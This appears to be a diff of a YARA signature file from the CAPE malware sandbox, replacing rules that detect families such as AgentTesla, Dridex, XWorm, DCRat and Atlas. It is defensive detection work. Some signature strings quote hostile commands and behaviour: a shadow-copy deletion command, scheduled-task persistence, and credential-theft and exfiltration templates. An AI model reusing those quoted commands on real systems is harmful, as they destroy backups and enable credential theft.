+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AgentTesla.yar#L43-L67"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "b45296b3b94fa1ff32de48c94329a17402461fb6696e9390565c4dba9738ed78"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Fareit Payload"
+		cape_type = "AgentTesla Payload"
 
 	strings:
-		$string1 = {0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 31 20 20 09 20 20 67 6F 74 6F 20 09 0D 20 6B 74 6B 0D 0A 20 64 65 6C 20 09 20 20 25 30 20 00}
+		$s1 = "get_kbHook" ascii
+		$s2 = "GetPrivateProfileString" ascii
+		$s3 = "get_OSFullName" ascii
+		$s4 = "get_PasswordHash" ascii
+		$s5 = "remove_Key" ascii
+		$s6 = "FtpWebRequest" ascii
+		$s7 = "logins" fullword wide
+		$s8 = "keylog" fullword wide
+		$s9 = "1.85 (Hash, version 2, native byte-order)" wide
+		$cl1 = "Postbox" fullword ascii
+		$cl2 = "BlackHawk" fullword ascii
+		$cl3 = "WaterFox" fullword ascii
+		$cl4 = "CyberFox" fullword ascii
+		$cl5 = "IceDragon" fullword ascii
+		$cl6 = "Thunderbird" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $string* )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 6 of ( $s* ) and 2 of ( $cl* ) )
 }
-rule CAPE_Stealc : FILE
+rule CAPE_Agentteslav3 : FILE
 {
 	meta:
-		description = "Stealc Payload"
-		author = "kevoreilly"
-		id = "77567584-7c84-5351-938b-d29d612a042d"
-		date = "2024-09-10"
-		modified = "2024-09-10"
+		description = "AgentTeslaV3 infostealer payload"
+		author = "ditekshen"
+		id = "cfe00382-8663-54a4-a7c4-b932ec7ad5e3"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Stealc.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
-		logic_hash = "a6165168b7c74761b91d1691465688c748227b830813067edb4e9bdc934271c4"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AgentTesla.yar#L69-L111"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "26c4fa0ce8de6982eb599f3872e8ab2a6e83da4741db7f3500c94e0a8fe5d459"
 		score = 75
-		quality = 70
+		quality = 68
 		tags = "FILE"
-		cape_type = "Stealc Payload"
+		cape_type = "AgentTesla payload"
 
 	strings:
-		$nugget1 = {68 04 01 00 00 6A 00 FF 15 [4] 50 FF 15}
-		$nugget2 = {64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC}
+		$s1 = "get_kbok" fullword ascii
+		$s2 = "get_CHoo" fullword ascii
+		$s3 = "set_passwordIsSet" fullword ascii
+		$s4 = "get_enableLog" fullword ascii
+		$s5 = "bot%telegramapi%" wide
+		$s6 = "KillTorProcess" fullword ascii
+		$s7 = "GetMozilla" ascii
+		$s8 = "torbrowser" wide
+		$s9 = "%chatid%" wide
+		$s10 = "logins" fullword wide
+		$s11 = "credential" fullword wide
+		$s12 = "AccountConfiguration+" wide
+		$s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide
+		$s14 = "set_Lenght" fullword ascii
+		$s15 = "get_Keys" fullword ascii
+		$s16 = "set_AllowAutoRedirect" fullword ascii
+		$s17 = "set_wtqQe" fullword ascii
+		$s18 = "set_UseShellExecute" fullword ascii
+		$s19 = "set_IsBodyHtml" fullword ascii
+		$s20 = "set_FElvMn" fullword ascii
+		$s21 = "set_RedirectStandardOutput" fullword ascii
+		$g1 = "get_Clipboard" fullword ascii
+		$g2 = "get_Keyboard" fullword ascii
+		$g3 = "get_Password" fullword ascii
+		$g4 = "get_CtrlKeyDown" fullword ascii
+		$g5 = "get_ShiftKeyDown" fullword ascii
+		$g6 = "get_AltKeyDown" fullword ascii
+		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
+		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
+		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
+		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
+		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $s* ) and 4 of ( $g* ) ) ) ) or ( 2 of ( $m* ) )
 }
-rule CAPE_Ryuk : FILE
+rule CAPE_Agentteslav4 : FILE
 {
 	meta:
-		description = "Ryuk Payload"
+		description = "AgentTesla Payload"
 		author = "kevoreilly"
-		id = "594bbb8d-1f85-5a01-a864-ac2d95c45bf9"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "a39109ca-84cb-527d-b9c2-d8763fa6e496"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Ryuk.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "b4463993d8956e402b927a3dcfa2ca9693a959908187f720372f2d3a40e6db0c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AgentTesla.yar#L113-L126"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "0a39036f408728ab312a54ff3354453d171424f57f9a8f3b42af867be3037ca9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Ryuk Payload"
+		cape_type = "AgentTesla Payload"
+		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
 
 	strings:
-		$ext = ".RYK" wide
-		$readme = "RyukReadMe.txt" wide
-		$main = "InvokeMainViaCRT"
-		$code = {48 8B 4D 10 48 8B 03 48 C1 E8 07 C1 E0 04 F7 D0 33 41 08 83 E0 10 31 41 08 48 8B 4D 10 48 8B 03 48 C1 E8 09 C1 E0 03 F7 D0 33 41 08 83 E0 08 31 41 08}
+		$decode1 = {(07|FE 0C 01 00) (07|FE 0C 01 00) 8E 69 (17|20 01 00 00 00) 63 8F ?? 00 00 01 25 47 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A D2 61 D2 52}
+		$decode2 = {(07|FE 0C 01 00) (08|FE 0C 02 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (11 07|FE 0C 07 00) 91 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A 61 D2 61 D2 52}
+		$decode3 = {(07|FE 0C 01 00) (11 07|FE 0C 07 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (08|FE 0C 02 00) 91 61 D2 52}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of ( $* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Mole : FILE
+rule CAPE_Agentteslav4Jit
 {
 	meta:
-		description = "Mole Payload"
+		description = "AgentTesla JIT-compiled native code"
 		author = "kevoreilly"
-		id = "1185170f-4a5b-5347-807b-ef2af98a1a09"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "a87dca44-4974-543c-9565-487ed99be2a6"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Mole.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "8be4d190d554a610360c0e04b33da59eb00319395e5b2000d580546ce6503786"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AgentTesla.yar#L128-L141"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "8f7144d2a989ce8d291af926b292f5f0f7772e707b0e49797eba13ecf91b90bc"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Mole Payload"
+		tags = ""
+		cape_type = "AgentTesla Payload"
+		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
 
 	strings:
-		$a1 = ".mole0" wide
-		$a2 = "_HELP_INSTRUCTION.TXT" wide
-		$a3 = "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
+		$decode1 = {8B 01 8B 40 3C FF 50 10 8B C8 E8 [4] 89 45 CC B8 1A 00 00 00}
+		$decode2 = {83 F8 18 75 2? 8B [2-5] D1 F8}
+		$decode3 = {8D 4C 0? 08 0F B6 01 [0-3] 0F B6 5? 04 33 C2 88 01 B8 19 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		2 of them
 }
-rule CAPE_Stormkitty : FILE
+rule CAPE_Dridexv4 : FILE
 {
 	meta:
-		description = "StormKitty infostealer payload"
-		author = "ditekSHen"
-		id = "71239da9-064f-58c4-a6fa-eb4983a3f55e"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "Dridex v4 Payload"
+		author = "kevoreilly"
+		id = "c396f664-9f0d-50ac-bce8-33fd8712645a"
+		date = "2022-05-31"
+		modified = "2022-05-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L32-L57"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "258f5d9da80ff912459194b1139f062491df21a44456942951e2bd98e4b86c9b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/DridexV4.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "cb103fe5f2d4792e3c612db4e2d84a4c8b0ce0f9a8443e9147e2c345f1dbdff6"
 		score = 75
-		quality = 66
+		quality = 70
 		tags = "FILE"
-		cape_type = "StormKitty Payload"
+		cape_type = "DridexV4 Payload"
 
 	strings:
-		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
-		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
-		$x3 = "StormKitty" fullword ascii
-		$s1 = "GetBSSID" fullword ascii
-		$s2 = "GetAntivirus" fullword ascii
-		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
-		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
-		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
-		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
-		$ww2 = "WorldWindClient" wide fullword nocase
-		$ww3 = "WorldWindStealer" wide fullword nocase
-		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
-		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
-		$prynt = /Prynt(\s)?Stealer/ ascii wide
+		$decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57}
+		$getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3}
+		$getproc64 = {81 FB ?? ?? ?? ?? 75 04 33 C0 EB 2D 8B CB E8 ?? ?? ?? ?? 48 85 C0 75 17 8B CB E8 ?? ?? ?? ?? 84 C0 74 E5 8B CB E8 ?? ?? ?? ?? 48 85 C0 74 D9 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B 5C 24 30 48 83 C4 20 5F C3}
+		$bot_stub_32 = {8B 45 E? 8? [5-13] 8A 1C 0? [6-15] 05 FF 00 00 00 8B ?? F? 39 ?? 89 45 E? 72 D?}
+		$bot_stub_64 = {8B 44 24 ?? 89 C1 89 CA 4C 8B 05 [4] 4C 8B 4C 24 ?? 45 8A 14 11 83 E0 1F 89 C0 41 89 C3 47 2A 14 18 44 88 54 14}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( not any of ( $ww* ) and not $prynt ) and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Worldwind : FILE
+rule CAPE_Atlas : FILE
 {
 	meta:
-		description = "Detects WorldWind infostealer"
-		author = "ditekSHen"
-		id = "226f591a-dc06-54f5-96ae-d142f624ff71"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "Atlas Payload"
+		author = "kevoreilly"
+		id = "22322e5c-ded6-56df-8a39-a8f5cbc18239"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L60-L82"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "9bb04fad460193cd877ea7f2de9337f69aadda01aee6c79f0a23cdf564b1e6c8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Atlas.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "c3f73b29df5caf804dbfe3e6ac07a9e2c772bd2a126f0487e4a65e72bd501e6e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "WorldWind Payload"
+		cape_type = "Atlas Payload"
 
 	strings:
-		$c1 = /WorldWind(\s)?Stealer/ ascii wide
-		$x2 = "@FlatLineStealer" ascii wide
-		$x3 = "@CashOutGangTalk" ascii wide
-		$m1 = ".Passwords.Targets." ascii
-		$m2 = ".Modules.Keylogger" ascii
-		$m3 = ".Modules.Clipper" ascii
-		$m4 = ".Modules.Implant" ascii
-		$s1 = "--- Clipper" wide
-		$s2 = "Downloading file: \"{file}\"" wide
-		$s3 = "/bot{0}/getUpdates?offset={1}" wide
-		$s4 = "send command to bot!" wide
-		$s5 = " *Keylogger " fullword wide
-		$s6 = "*Stealer" wide
-		$s7 = "Bot connected" wide
+		$a1 = "bye.bat"
+		$a2 = "task=knock&id=%s&ver=%s x%s&disks=%s&other=%s&ip=%s&pub="
+		$a3 = "process call create \"cmd /c start vssadmin delete shadows /all /q"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Prynt : FILE
+rule CAPE_Fareit : FILE
 {
 	meta:
-		description = "Detects Prynt infostealer"
-		author = "ditekSHen"
-		id = "844fd100-b04e-5ff0-9fab-d45f48b55bcc"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "Fareit Payload"
+		author = "kevoreilly"
+		id = "b3c4eb86-d104-5f31-afa4-5bf5f370f64e"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L85-L107"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "84f2b33285ab1d129a62940a02990639cc8f7c92d490d7257e6aed9170d1e34e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Fareit.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "ed35391ffc949219f380da3f22bc8397a7d5c742bd68e227c3becdebcab5cf83"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Prynt Payload"
+		cape_type = "Fareit Payload"
 
 	strings:
-		$c1 = /Prynt(\s)?Stealer/ ascii wide
-		$x2 = "@FlatLineStealer" ascii wide
-		$x3 = "@CashOutGangTalk" ascii wide
-		$m1 = ".Passwords.Targets." ascii
-		$m2 = ".Modules.Keylogger" ascii
-		$m3 = ".Modules.Clipper" ascii
-		$m4 = ".Modules.Implant" ascii
-		$s1 = "--- Clipper" wide
-		$s2 = "Downloading file: \"{file}\"" wide
-		$s3 = "/bot{0}/getUpdates?offset={1}" wide
-		$s4 = "send command to bot!" wide
-		$s5 = " *Keylogger " fullword wide
-		$s6 = "*Stealer" wide
-		$s7 = "Bot connected" wide
+		$string1 = {0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 31 20 20 09 20 20 67 6F 74 6F 20 09 0D 20 6B 74 6B 0D 0A 20 64 65 6C 20 09 20 20 25 30 20 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and any of ( $string* )
 }
-rule CAPE_Xworm_1 : FILE
+
+rule CAPE_Nighthawk
 {
 	meta:
-		description = "Detects XWorm"
-		author = "ditekSHen"
-		id = "bf9115a7-850a-5326-860c-a9a71bc7e50c"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "NightHawk C2"
+		author = "Nikhil Ashok Hegde <@ka1do9>"
+		id = "096b9d13-6aa7-5b6e-aaeb-e25aa7c8c53f"
+		date = "2022-12-05"
+		modified = "2022-12-05"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L110-L136"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5a86c2f0a188135e53d86c176806a208abbe3dd830bde364016859ffa5294bd7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Nighthawk.yar#L3-L24"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "2d77912678e06503ffef0e8ed84aa4f9ac74357480d57742fbae619acebfb5f2"
 		score = 75
-		quality = 68
-		tags = "FILE"
-		cape_type = "XWorm Payload"
+		quality = 70
+		tags = ""
+		cape_type = "Nighthawk Payload"
 
 	strings:
-		$x1 = "XWorm " wide nocase
-		$x2 = /XWorm\s(V|v)\d+\.\d+/ fullword wide
-		$s1 = "RunBotKiller" fullword wide
-		$s2 = "XKlog.txt" fullword wide
-		$s3 = /(shell|reg)fuc/ fullword wide
-		$s4 = "closeshell" fullword ascii
-		$s5 = { 62 00 79 00 70 00 73 00 73 00 00 ?? 63 00 61 00 6c 00 6c 00 75 00 61 00 63 00 00 ?? 73 00 63 00 }
-		$s6 = { 44 00 44 00 6f 00 73 00 54 00 00 ?? 43 00 69 00 6c 00 70 00 70 00 65 00 72 00 00 ?? 50 00 45 00 }
-		$s7 = { 69 00 6e 00 6a 00 52 00 75 00 6e 00 00 ?? 73 00 74 00 61 00 72 00 74 00 75 00 73 00 62 }
-		$s8 = { 48 6f 73 74 00 50 6f 72 74 00 75 70 6c 6f 61 64 65 72 00 6e 61 6d 65 65 65 00 4b 45 59 00 53 50 4c 00 4d 75 74 65 78 78 00 }
-		$v2_1 = "PING!" fullword wide
-		$v2_2 = "Urlhide" fullword wide
-		$v2_3 = /PC(Restart|Shutdown)/ fullword wide
-		$v2_4 = /(Start|Stop)(DDos|Report)/ fullword wide
-		$v2_5 = /Offline(Get|Keylogger)/ wide
-		$v2_6 = "injRun" fullword wide
-		$v2_7 = "Xchat" fullword wide
-		$v2_8 = "UACFunc" fullword ascii wide
+		$keying_methods = { 85 C9 74 43 83 E9 01 74 1C 83 F9 01 0F 85 }
+		$aes_sbox = { 63 7C 77 7B F2 6B 6F C5 30 }
+		$aes_inv_sbox = { 52 09 6A D5 30 36 A5 38 BF }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v2* ) ) ) or 6 of them )
+		pe.is_pe and for any s in pe.sections : ( s.name == ".profile" ) and all of them
 }
-rule CAPE_Xworm_Kingrat
+rule CAPE_Mole : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "76332a42-97c9-52fe-83dc-04ceb367f692"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "Mole Payload"
+		author = "kevoreilly"
+		id = "1185170f-4a5b-5347-807b-ef2af98a1a09"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L138-L155"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "3914be652bb7271e5e6b89d05edf10a54f8ddaf9e22d194b60501aa2cdd495d3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Mole.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "8be4d190d554a610360c0e04b33da59eb00319395e5b2000d580546ce6503786"
 		score = 75
-		quality = 66
-		tags = ""
-		cape_type = "XWorm payload"
+		quality = 70
+		tags = "FILE"
+		cape_type = "Mole Payload"
 
 	strings:
-		$str_xworm = "xworm" wide ascii nocase
-		$str_xwormmm = "Xwormmm" wide ascii
-		$str_xclient = "XClient" wide ascii
-		$str_default_log = "\\Log.tmp" wide ascii
-		$str_create_proc = "/create /f /RL HIGHEST /sc minute /mo 1 /t" wide ascii
-		$str_ddos_start = "StartDDos" wide ascii
-		$str_ddos_stop = "StopDDos" wide ascii
-		$str_timeout = "timeout 3 > NUL" wide ascii
-		$byte_md5_hash = { 7e [3] 04 28 [3] 06 6f }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$a1 = ".mole0" wide
+		$a2 = "_HELP_INSTRUCTION.TXT" wide
+		$a3 = "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
 
 	condition:
-		5 of them and #patt_config >= 7
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Dcrat : FILE
+rule CAPE_Gootkit : FILE
 {
 	meta:
-		description = "DCRat payload"
-		author = "ditekSHen"
-		id = "16c81fe0-2c18-55e9-aa17-cfd4213d6a17"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "Gootkit Payload"
+		author = "kevoreilly"
+		id = "8935fd10-ac79-5196-80c2-fc8f2fe185b5"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L157-L222"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5a02dcc2b9c7eb3efdba39047e37886240b45fb7e2db3b82aa5b4b9526dfb7f8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Gootkit.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "26704b6b0adca51933fc9d5e097930320768fd0e9355dcefc725aee7775316e7"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = "FILE"
-		cape_type = "DCRat Payload"
+		cape_type = "Gootkit Payload"
 
 	strings:
-		$dc1 = "DCRatBuild" ascii
-		$dc2 = "DCStlr" ascii
-		$x1 = "px\"><center>DCRat Keylogger" wide
-		$x2 = "DCRat-Log#" wide
-		$x3 = "DCRat.Code" wide
-		$string1 = "CaptureBrowsers" fullword ascii
-		$string2 = "DecryptBrowsers" fullword ascii
-		$string3 = "Browsers.IE10" ascii
-		$string4 = "Browsers.Chromium" ascii
-		$string5 = "WshShell" ascii
-		$string6 = "SysMngmts" fullword ascii
-		$string7 = "LoggerData" fullword ascii
-		$plugin = "DCRatPlugin" fullword ascii
-		$av1 = "AntiVM" ascii wide
-		$av2 = "vmware" fullword wide
-		$av3 = "VirtualBox" fullword wide
-		$av4 = "microsoft corporation" fullword wide
-		$av5 = "VIRTUAL" fullword wide
-		$av6 = "DetectVirtualMachine" fullword ascii
-		$av7 = "Select * from Win32_ComputerSystem" fullword wide
-		$pl1 = "dcratAPI" fullword ascii
-		$pl2 = "dsockapi" fullword ascii
-		$pl3 = "file_get_contents" fullword ascii
-		$pl4 = "classthis" fullword ascii
-		$pl5 = "typemdt" fullword ascii
-		$pl6 = "Plugin_AutoStealer" ascii wide
-		$pl7 = "Plugin_AutoKeylogger" ascii wide
-		$v1 = "Plugin couldn't process this action!" wide
-		$v2 = "Unknown command!" wide
-		$v3 = "PLUGINCONFIGS" wide
-		$v4 = "Saving log..." wide
-		$v5 = "~Work.log" wide
-		$v6 = "MicrophoneNum" fullword wide
-		$v7 = "WebcamNum" fullword wide
-		$v8 = "%SystemDrive% - Slow" wide
-		$v9 = "%UsersFolder% - Fast" wide
-		$v10 = "%AppData% - Very Fast" wide
-		$v11 = /<span style=\"color: #F85C50;\">\[(Up|Down|Enter|ESC|CTRL|Shift|Win|Tab|CAPSLOCK: (ON|OFF))\]<\/span>/ wide
-		$px1 = "[Browsers] Scanned elements: " wide
-		$px2 = "[Browsers] Grabbing cookies" wide
-		$px3 = "[Browsers] Grabbing passwords" wide
-		$px4 = "[Browsers] Grabbing forms" wide
-		$px5 = "[Browsers] Grabbing CC" wide
-		$px6 = "[Browsers] Grabbing history" wide
-		$px7 = "[StealerPlugin] Invoke: " wide
-		$px8 = "[Other] Grabbing steam" wide
-		$px9 = "[Other] Grabbing telegram" wide
-		$px10 = "[Other] Grabbing discord tokens" wide
-		$px11 = "[Other] Grabbing filezilla" wide
-		$px12 = "[Other] Screenshots:" wide
-		$px13 = "[Other] Clipboard" wide
-		$px14 = "[Other] Saving system information" wide
+		$code1 = {C7 45 ?? ?? ?? 4? 00 C7 45 ?? ?? 10 40 00 C7 45 E? D8 ?? ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 [1-2] 00 10 40 00 89 [5-6] 43 00 89 ?? ?? 68 E8 80 00 00 FF 15}
 
 	condition:
